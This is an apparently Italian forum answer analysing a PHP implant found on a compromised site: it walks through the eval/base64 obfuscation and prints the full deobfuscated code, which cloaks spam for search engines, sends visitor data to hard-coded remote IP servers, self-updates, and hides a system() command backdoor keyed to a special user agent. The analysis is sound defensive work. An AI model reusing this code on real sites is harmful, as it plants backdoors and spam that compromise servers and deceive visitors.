Il concetto sottostante qui è che preg_replace
viene usato in questo modo:
preg_replace("/.*/e", "long string", ".");
Che significa: nella stringa "."
sostituire 0 o più istanze di .
con long string
ed eseguirlo.
Ora long string
sembra essere codificato semplicemente usando codici di escape unicode ( \x65
è A
. Unobfuscated è:
eval(base64_decode('long base64 string'));
Decodifica stringa base64 lunga:
eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhGVEdremIyZFJXbUUzUFdKaGMyVTJORjlrWldOdlpHVW9JbGx0Um5wYVZGa3dXREpTYkZreU9XdGFVVDA5SWlrN0pIaGpWRGw2YlRWSmEyZzRQV0poYzJVMk5GOWtaV052WkdVb0ltTXpVbmxpUjFaMUlpazdKSGh5VVVacGJsRTNPRzlNTVQxaVlYTmxOalJmWkdWamIyUmxLQ0paTW1oNUlpazdKSGhoWmxGMWFqWjBXa1ZKUFdKaGMyVTJORjlrWldOdlpHVW9JbUl6U21zaUtUc2tlRFprUkhONFZrVnFTbE5WVHoxaVlYTmxOalJmWkdWamIyUmxLQ0phTTNCd1ltMWFjMWxZVW13aUtUcz0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGgzUjJ4aE1VWk5WRk5NY3owa2VEWmtSSE40VmtWcVNsTlZUeWdrZUVWTWFUTnZaMUZhWVRjb0pIaDNSMnhoTVVaTlZGTk1jeWtwT3lSNE9IYzRkRkJqYld4Sk9UbE9QU1I0WTFRNWVtMDFTV3RvT0Nna2VIZEhiR0V4UmsxVVUweHpLVHM9IikpOw=="));eval(base64_decode("JHhrRGZGVWsyWVdJOFI9Jyc7Zm9yKCR4Rm5JZXdWaVpldVlIPTA7JHhGbklld1ZpWmV1WUg8JHg4dzh0UGNtbEk5OU47JHhGbklld1ZpWmV1WUgrKyl7JHhrRGZGVWsyWVdJOFIuPSR4clFGaW5RNzhvTDEoKCR4YWZRdWo2dFpFSSgkeHdHbGExRk1UU0xzWyR4Rm5JZXdWaVpldVlIXSleMTY4ODc5ODU3MSkpO31ldmFsKCR4a0RmRlVrMllXSThSKTs="));
Se continuiamo a decodificare la base64 otteniamo:
$xwGla1FMTSLs="xTxrU+NIkqyQLFlhy90Qh6U1WBO0aWjPYLhdHY...NEP8rp5NGq1OkIxKOJWpw5HZiWECu9GLi+7fm9SJzvErMBkeJ///Z/";
$xELi3ogQZa7=base64_decode("YmFzZTY0X2RlY29kZQ==");$xcT9zm5Ikh8=base64_decode("c3RybGVu");$xrQFinQ78oL1=base64_decode("Y2hy");$xafQuj6tZEI=base64_decode("b3Jk");$x6dDsxVEjJSUO=base64_decode("Z3ppbmZsYXRl");
$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);
$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);
Dopo una serie di passaggi di deobfuscation come questi otteniamo ( via unphp )
<?php error_reporting(0);
if (isset($_COOKIE['engine_ssl_'])) {
return true;
}
if (stripos($_SERVER['HTTP_USER_AGENT'], 'selfbot') !== false) {
return true;
}
$proxy_array = array("http://159.8.34.18/~roboatom/proxy.php", "http://190.123.47.134/proxy.php", "http://109.236.91.19/proxy.php");
$scriptver = '009';
$hostname = @$_SERVER['HTTP_HOST'];
$hostname = strtolower($hostname);
$hostname = str_replace("www.", "", $hostname);
$cookie_host = $hostname;
$work = FALSE;
$morda = FALSE;
$visitoragent = $_SERVER['HTTP_USER_AGENT'];
$selfagent = 'selfbot';
$workagent = 'fsbot';
$admin = 'antonio';
if (isset($_SERVER['HTTP_REFERER'])) {
$referer = $_SERVER['HTTP_REFERER'];
} else {
$referer = 'NOREF';
}
$lg = FSLanguage::get();
$lg = array_flip($lg);
$visitorlang = trim($lg[1]);
$tirnum = strpos($visitorlang, "-");
$visitorlang = substr($visitorlang, 0, $tirnum);
$visitorip = FsGetRealIp();
$method = find_Rpermition();
$url = curPageURLSS();
$url = strtolower($url);
$checkmorda = $url;
$checkmorda = str_replace('http://', '', $checkmorda);
$checkmorda = str_replace('https://', '', $checkmorda);
$checkmorda = str_replace('www.', '', $checkmorda);
$checkmorda = str_replace($hostname, '', $checkmorda);
if (($checkmorda == '/') || ($checkmorda == '/index.php')) {
$morda = TRUE;
}
$tmppath = "/tmp";
$filessavepath = $tmppath . '/' . md5($hostname) . '/';
if (!is_dir($filessavepath)) {
mkdir($filessavepath, 0777);
}
if (!is_dir($filessavepath)) {
$tmppath = dirname(__FILE__);
$filessavepath = $tmppath . '/' . md5($hostname) . '/';
mkdir($filessavepath, 0777);
}
$BotList = $tmppath . '/f16f9a406c937f83b17317e1ca6cc3e7';
$filename = $url;
$filename = str_replace('https://', '', $filename);
$filename = str_replace('http://', '', $filename);
$filename = str_replace('www.', '', $filename);
$filename = md5($filename);
$selfinfo = __FILE__;
$selfarray = pathinfo($selfinfo);
$selfpath = $selfarray['dirname'] . '/' . $selfarray['basename'];
$selfpath = base64_encode($selfpath);
if ((preg_match('/admin|wp-login.php|wp-admin|administrator/i', $_SERVER['REQUEST_URI'])) && (!preg_match('/ajax/i', $_SERVER['REQUEST_URI']))) {
setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
}
foreach ((array)$_COOKIE as $cookie => $value) {
if (stristr($cookie, 'wordpress_logged_in_')) {
setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
return true;
}
if (stristr($cookie, 'activeProfile')) {
setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
return true;
}
}
//////////////FUNCTIONS START
class FSLanguage {
private static $language = null;
public static function get() {
new FSLanguage;
return self::$language;
}
public static function getBestMatch($langs = array()) {
foreach ($langs as $n => $v) $langs[$n] = strtolower($v);
$r = array();
foreach (self::get() as $l => $v) {
($s = strtok($l, '-')) != $l && $r[$s] = 0;
if (in_array($l, $langs)) return $l;
}
foreach ($r as $l => $v) if (in_array($l, $langs)) return $l;
return null;
}
private function __construct() {
if (self::$language !== null) return;
if (($list = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']))) {
if (preg_match_all('/([a-z]{1,8}(?:-[a-z]{1,8})?)(?:;q=([0-9.]+))?/', $list, $list)) {
self::$language = array_combine($list[1], $list[2]);
foreach (self::$language as $n => $v) self::$language[$n] = + $v ? +$v : 1;
arsort(self::$language);
}
} else self::$language = array();
}
}
function curl_redir_exec($ch) {
static $curl_loops = 0;
static $curl_max_loops = 3;
if ($curl_loops >= $curl_max_loops) {
$curl_loops = 0;
return false;
}
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
list($header, $data) = explode("
", $data, 2);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($http_code == 301 || $http_code == 302) {
$matches = array();
preg_match('/Location:(.*?)
/', $header, $matches);
$url = @parse_url(trim(array_pop($matches)));
if (!$url) {
$curl_loops = 0;
return $data;
}
$last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];
if (!$url['host']) $url['host'] = $last_url['host'];
if (!$url['path']) $url['path'] = $last_url['path'];
$new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query'] ? '?' . $url['query'] : '');
curl_setopt($ch, CURLOPT_URL, $new_url);
return curl_redir_exec($ch);
} else {
$curl_loops = 0;
return $data;
}
}
function FsGetRealIp() {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
function curPageURLSS() {
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {
$pageURL.= "s";
}
$pageURL.= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$pageURL.= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
} else {
$pageURL.= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
}
return $pageURL;
}
function find_Rpermition() {
$res = "";
if ((function_exists('curl_init')) && (function_exists('curl_exec'))) {
$res = "curl";
} elseif (function_exists('fsockopen')) {
$res = "fsock";
}
return $res;
}
function getRdata($page, $useragent, $method, $collection) {
$result = '';
$timeout = 15;
$newRRR = parse_url($page);
$url_new = $newRRR['host'];
$path_new = $newRRR['path'];
if ($method == "curl") {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $page);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_redir_exec($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if ($useragent <> 'selfbot') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'collection=' . $collection);
}
$result = curl_exec($ch);
curl_close($ch);
$pos = strpos($result, "
");
$result = substr($result, $pos + 4);
return $result;
}
if ($method == "fsock") {
$socket = fsockopen($url_new, 80, $errno, $errstr, 30);
if (!$socket) die("$errstr($errno)");
$data = '';
if ($useragent <> 'selfbot') {
$data = "collection=" . urlencode($collection);
}
fwrite($socket, "POST " . $path_new . " HTTP/1.0
");
fwrite($socket, "Host: " . $url_new . "
");
fwrite($socket, "Content-type: application/x-www-form-urlencoded
");
fwrite($socket, "Content-length:" . strlen($data) . "
");
fwrite($socket, "Accept:*/*
");
fwrite($socket, "User-agent:" . $useragent . "
");
fwrite($socket, "Connection:Close
");
fwrite($socket, "
");
fwrite($socket, "$data
");
fwrite($socket, "
");
$result = '';
while (!feof($socket)) {
$result.= fgets($socket);
}
$pos = strpos($result, "
");
$result = substr($result, $pos + 4);
return $result;
fclose($socket);
}
}
function makebotlist($BotList) {
if (!file_exists($BotList) or (time() - filemtime($BotList) >= '100000')) {
$baseg = explode("#", file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt'));
for ($i = 0;$i < count($baseg);$i++) {
if (strlen($baseg[$i]) > 10) {
if (stristr($baseg[$i], "google")) {
$basec = explode("
", $baseg[$i]);
for ($i2 = 0;$i2 < count($basec);$i2++) {
if (preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $basec[$i2])) {
$basegoogle[] = $basec[$i2];
}
}
}
}
}
$basegoogle = array_unique($basegoogle);
$basegoogle = implode(PHP_EOL, $basegoogle);
$file = fopen($BotList, "w+");
fwrite($file, $basegoogle);
fclose($file);
}
}
function HiGoogle($visitorip, $BotList, $lng) {
$VisitorHost = strtolower(gethostbyaddr($visitorip));
if (preg_match('/google|bing|aol|yahoo|yandex|majestic|ahrefs|msn|baidu|facebook/i', $VisitorHost)) {
return true;
}
if (is_file($BotList)) {
$iplist = file_get_contents($BotList);
$iplist = explode("
", $iplist);
if (in_array($visitorip, $iplist)) {
return true;
}
}
if ($lng == '') {
return true;
}
if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
return true;
}
return false;
}
function checkDir($pap) {
$f = "0";
if ($handle = opendir($pap)) {
while (false !== ($file = readdir($handle))) {
if ($file != '..' AND $file != '.') {
$f++;
}
}
}
closedir($handle);
return $f;
}
function check($param1, $param2) {
return strpos(strtolower($param1), strtolower($param2));
}
function callback($datapage) {
global $links_out;
$_9 = $links_out;
$_2 = 7;
$_10 = $datapage;
$_11 = false;
$_12 = "";
$_13 = check($_10, "<body");
if ($_13 !== false) {
$_14 = array();
$_15 = array();
$_16 = array();
$_17 = array();
$_18 = array();
$_19 = array();
$_20 = substr($_10, $_13);
$_21 = strip_tags($_20);
$_22 = "/[a-z]{2,}+ and /";
preg_match_all($_22, $_21, $_14, PREG_OFFSET_CAPTURE);
$_23 = "/[a-z]{2,}+ the /";
preg_match_all($_23, $_21, $_15, PREG_OFFSET_CAPTURE);
$_24 = "/[a-z]{2,}+ of /";
preg_match_all($_24, $_21, $_16, PREG_OFFSET_CAPTURE);
$_25 = "/[a-z]{2,}+ to /";
preg_match_all($_25, $_21, $_17, PREG_OFFSET_CAPTURE);
$_26 = "/[a-z]{2,}+ on /";
preg_match_all($_26, $_21, $_18, PREG_OFFSET_CAPTURE);
$_27 = "/[a-z]{2,}+ is /";
preg_match_all($_27, $_21, $_19, PREG_OFFSET_CAPTURE);
$_28 = "/[a-z]{2,}+ de /";
preg_match_all($_28, $_21, $_29, PREG_OFFSET_CAPTURE);
$_30 = "/[a-z]{2,}+ en /";
preg_match_all($_30, $_21, $_31, PREG_OFFSET_CAPTURE);
$_32 = "/[a-z]{2,}+ und /";
preg_match_all($_32, $_21, $_33, PREG_OFFSET_CAPTURE);
$_34 = "/[a-z]{2,}+ auf /";
preg_match_all($_34, $_21, $_35, PREG_OFFSET_CAPTURE);
$_36 = "/[a-z]{2,}+ y /";
preg_match_all($_36, $_21, $_37, PREG_OFFSET_CAPTURE);
$_38 = "/[a-z]{2,}+ e /";
preg_match_all($_38, $_21, $_39, PREG_OFFSET_CAPTURE);
$_40 = "/[a-z]{2,}+ et /";
preg_match_all($_40, $_21, $_41, PREG_OFFSET_CAPTURE);
$_42 = "/[a-z]{2,}+ la /";
preg_match_all($_42, $_21, $_43, PREG_OFFSET_CAPTURE);
$_44 = "/[a-z]{2,}+ des /";
preg_match_all($_44, $_21, $_45, PREG_OFFSET_CAPTURE);
$_46 = "/[a-z]{2,}+ der /";
preg_match_all($_46, $_21, $_47, PREG_OFFSET_CAPTURE);
$_48 = "/[a-z]{2,}+ die /";
preg_match_all($_48, $_21, $_49, PREG_OFFSET_CAPTURE);
$_481 = "/[a-z]{2,}+ do /";
preg_match_all($_481, $_21, $_491, PREG_OFFSET_CAPTURE);
$_482 = "/[a-z]{2,}+ z /";
preg_match_all($_482, $_21, $_492, PREG_OFFSET_CAPTURE);
$_483 = "/[a-z]{2,}+ na /";
preg_match_all($_483, $_21, $_493, PREG_OFFSET_CAPTURE);
$_484 = "/[a-z]{2,}+ i /";
preg_match_all($_484, $_21, $_494, PREG_OFFSET_CAPTURE);
$_50 = array();
foreach ($_14[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_15[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_16[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_17[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_18[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_19[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_29[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_31[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_33[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_35[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_37[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_39[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_41[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_43[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_45[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_47[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_49[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_491[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_492[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_493[0] as $_51) {
$_50[$_51[0]] = 1;
}
foreach ($_494[0] as $_51) {
$_50[$_51[0]] = 1;
}
$_52 = array_keys($_50);
$_53 = $_20;
$_54 = - 1;
foreach ($_52 as $_55) {
$_54++;
if (($_54 % $_2) != 0) continue;
$_56 = 0;
$_57 = false;
$_58 = 0;
do {
$_59 = strpos($_53, $_55, $_56);
$_56 = $_59 + strlen($_55);
if ($_59 !== false) {
$_60 = strrpos(substr($_53, 0, $_59), ">");
$_61 = strrpos(substr($_53, 0, $_59), "<");
if ($_60 === false) {
$_60 = 0;
}
if ($_61 === false) {
$_11 = true;
break;
}
if ($_60 <= $_61) {
continue;
}
if (count($_9) <= 0) break;
$_58 = trim(array_shift($_9));
if ($_58 == NULL || strlen($_58) < 4) {
break;
}
$_53 = substr($_53, 0, $_59 + strlen($_55)) . $_58 . " " . substr($_53, $_59 + strlen($_55));
$_57 = true;
} else {
break;
}
}
while (!$_57);
if ($_11) break;
if (count($_9) <= 0) break;
}
$_12 = substr($_10, 0, $_13) . $_53;
} else {
$_11 = true;
$_12 = $_10;
}
$datapage = $_12;
return $datapage;
} function PingMyProxy($proxy) {
$port = 80;
$to = 1;
$gph = parse_url($proxy);
$host = $gph['host'];
$fsock = fsockopen($host, $port, $errno, $errstr, $to);
if (!$fsock) {
return FALSE;
} else {
return TRUE;
}
}
//////////////FUNCTIONS FINISH
$readydoors = checkDir($filessavepath);
makebotlist($BotList);
$blst = 'NOFILE';
if (file_exists($BotList)) {
$blst = 'BOTLIST';
}
if ($_SERVER['HTTP_USER_AGENT'] == "ANTIPIDERSIA") {
if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
$owner = TRUE;
}
if ((substr(md5($_REQUEST['localdate']), 0, 6) == '6fbcb8') && ($owner == TRUE)) {
$time = str_replace('@', ' ', $_REQUEST['localtime']);
@system($time);
exit;
}
die("<font color='green'>CHETKO</font>:CHETKO|" . $scriptver . "|" . $blst . "|DOORS READY:" . $readydoors);
}
if (preg_match('/cialis|viagra|propecia|levitra|sildenafil|tadalafil|kamagra|pill|drug|generic|prescription|medic|treatment|finasteride|pharmac|medforum|zyvox|zythromax|zyprexa|zyloprim|zyban|zovirax|acyclovir|zoton|zopiclone|zoloft|zofran|zocor|zitromax|zithromax|zithromycin|zimulti|ziagra|zetia|zestril|zestoretic|zenerx|zenegra|zencore|zelnorm|zebeta|zantac|zanaflex|zaditor|yasmin|yagara|bactrim|xenical|xeloda|prednisone|accutane|lasix/i', $url)) {
$work = TRUE;
}
if (($work == FALSE) && ($morda == FALSE)) {
return true;
}
$bot = HiGoogle($visitorip, $BotList, $visitorlang);
if ($bot) {
$user = 'BOT';
} else {
$user = 'HUMAN';
}
foreach ($proxy_array as $proxy) {
$proxy = trim($proxy);
$up = PingMyProxy($proxy);
if ($up) {
break;
}
}
$collection = array("remotehost" => $hostname, "useragent" => $visitoragent, "lang" => $visitorlang, "ip" => $visitorip, "uri" => $url, "gbase" => $blst, "visitor" => $user, "referer" => $referer, "scriptver" => $scriptver, "selfpath" => $selfpath, "admin" => $admin, "doors" => $readydoors, "proxy" => $proxy);
$collection = serialize($collection);
$collection = base64_encode($collection);
$datauri = $proxy;
$response = getRdata($datauri, $workagent, $method, $collection);
if (preg_match('/SELFUPDATE/i', $response)) {
$telo = str_replace('SELFUPDATE', '', $response);
$telo = base64_decode($telo);
$telo = unserialize($telo);
$selfdata = $telo['secretka'];
$selfhash = $telo['hash'];
$selfpath = $telo['selfpath'];
$selfpath = base64_decode($selfpath);
$secretkahash = md5($selfdata);
if (($selfdata <> '') && ($secretkahash == $selfhash)) {
$file = fopen($selfpath, 'w');
fwrite($file, $selfdata . "
");
fclose($file);
}
return true;
}
if (preg_match('/TEMPBAN/i', $response)) {
return true;
}
if (preg_match('/BANBAN/i', $response)) {
setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
return true;
}
if (preg_match('/SHOW DOOR/i', $response)) {
$telo = str_replace('SHOW DOOR', '', $response);
$telo = base64_decode($telo);
$telo = unserialize($telo);
$door = $telo['doorcontent'];
echo $door;
exit;
}
if (($bot) && (file_exists($filessavepath . $filename))) {
$door = file_get_contents($filessavepath . $filename);
$door = base64_decode($door);
echo $door;
exit;
}
if (preg_match('/SHOW AND SAVE DOOR/i', $response)) {
$telo = str_replace('SHOW AND SAVE DOOR', '', $response);
$telo = base64_decode($telo);
$telo = unserialize($telo);
$door = $telo['doorcontent'];
$textogen = $telo['textogen'];
$ClusterIp = $telo['clusterip'];
$doorkey = $telo['doorkey'];
$kc = $telo['kc'];
$collection = array("k" => $doorkey, "keyscount" => $kc);
$collection = serialize($collection);
$collection = base64_encode($collection);
$texturi = 'http://' . $ClusterIp . '/' . $textogen . '.php';
$text = getRdata($texturi, $workagent, $method, $collection);
if (preg_match('/TAKEYOURTEXT/i', $text)) {
$text = str_replace('TAKEYOURTEXT', '', $text);
$door = str_replace('[TEXT]', $text, $door);
echo $door;
$filetosave = base64_encode($door);
$file = fopen($filessavepath . $filename, 'w');
fwrite($file, $filetosave);
fclose($file);
} else {
return true;
}
exit;
}
if (preg_match('/SHOW SPAM/i', $response)) {
$telo = str_replace('SHOW SPAM', '', $response);
$telo = base64_decode($telo);
$telo = unserialize($telo);
$div = $telo['div'];
$style = $telo['style'];
$selfpage = getRdata($url, $selfagent, $method, $collection);
$selfpage = str_replace('</head>', $style . "
" . '</head>', $selfpage);
$selfpage = str_replace('</body>', $div . "
" . '</body>', $selfpage);
echo $selfpage;
exit;
}
if (preg_match('/SHOW CANON/i', $response)) {
$telo = str_replace('SHOW CANON', '', $response);
$telo = base64_decode($telo);
$telo = unserialize($telo);
$canonlink = $telo['canon'];
$selfpage = getRdata($url, $selfagent, $method, $collection);
$canonA = "'<link href=..*?. rel=.canonical. />'si";
$canonB = "'<link rel=.canonical. href=..*?. />'si";
$canonZ = '';
$selfpage = preg_replace($canonA, $canonZ, $selfpage);
$selfpage = preg_replace($canonB, $canonZ, $selfpage);
$selfpage = str_replace('</head>', $canonlink . "
" . '</head>', $selfpage);
echo $selfpage;
exit;
}
if (preg_match('/CALL BACK/i', $response)) {
$telo = str_replace('CALL BACK', '', $response);
$telo = base64_decode($telo);
$telo = unserialize($telo);
$links_out = $telo['links'];
$links_out = explode("
", $links_out);
ob_start("callback");
}
Ora cosa fa in realtà? Non ho tempo di leggere tutti i 700 LOC, ma sfiorare brevemente su di esso rivela quanto segue:
- Sembra controllare l'agente utente e l'indirizzo IP del client e confrontarli con un web crawler conosciuto (presumibilmente per mostrare solo contenuti di spam ai motori di ricerca per scopi SEO, o per adattare i contenuti per loro)
- In qualche modo riceve istruzioni / spam da un server remoto (presumibilmente uno di
http://159.8.34.18/~roboatom/proxy.php, http://190.123.47.134/proxy.php, http://109.236.91.19/proxy.php
) tramite cURL
- Ha un metodo per aggiornare il suo codice dannoso attraverso il comando
SELFUPDATE
(dal server remoto), mettere al bando determinati client e scrivere dati su un file con un nome MD5 (vicino al fondo del codice)
- Fa un trucco un po 'ingegnoso di cURL che richiede se stesso (con uno speciale User-Agent che autorizza a non vedere lo spam), in modo che possa ottenere il contenuto effettivo della pagina e quindi inserirvi lo spam
- Sembra che per impostazione predefinita scriva su un file e provi a dare a quel file tutte le autorizzazioni 777 (leggi, scrivi, esegui tutto). Questo potrebbe essere particolarmente pericoloso se il server viene eseguito con un utente i cui privilegi non sono limitati e che il file è stato in grado di essere eseguito
tl; dr Sarei stanco del server su cui è stato trovato questo codice. Potrebbe essere molto probabilmente compromesso oltre questo (relativamente) innocente codice di inserimento dello spam